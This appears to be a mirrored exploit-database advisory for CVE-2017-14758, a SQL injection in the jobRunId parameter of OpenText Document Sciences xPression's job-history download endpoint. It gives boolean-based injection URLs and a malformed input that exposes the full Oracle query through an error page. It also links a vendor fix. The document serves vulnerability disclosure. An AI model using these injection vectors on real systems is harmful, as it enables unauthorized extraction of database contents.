OpenText Document Sciences xPression 4.5SP1 Patch 13 - jobRunId SQL Injection Vulnerability

2017-10-02T00:00:00
ID 1337DAY-ID-28721
Type zdt
Reporter Marcin Woloszyn
Modified 2017-10-02T00:00:00

Description

Exploit for jsp platform in category web applications

                                        
                                            Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14758
 
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
 
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
 
SQL Injection:
==============
 
Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.
 
Vector :
--------
 
True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2
 
Additionally:
 
http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa
 
Results in the following error in response:
 
HTTP/1.1 200 OK
[...]
  <b>Errors:&nbps;</b>
 
  See nested exception&#x3b; nested exception is:
java.lang.RuntimeException:
com.dsc.uniarch.cr.error.CRException: CRReportingSL: Method
getJobRunsByIds did not succeed because of a database operation
failure.&#x3b;
	---> nested com.dsc.uniarch.cr.error.CRSyntaxException:
Database syntax error :SELECT  JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID=1502642747222443244706554841153aaa.&#x3b;
	---> nested java.sql.SQLSyntaxErrorException:
ORA-00933: SQL command not properly ended
 
An attacker can see whole query and injection point. This can also be
used for error-based data extraction.
 
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774

#  0day.today [2018-02-09]  #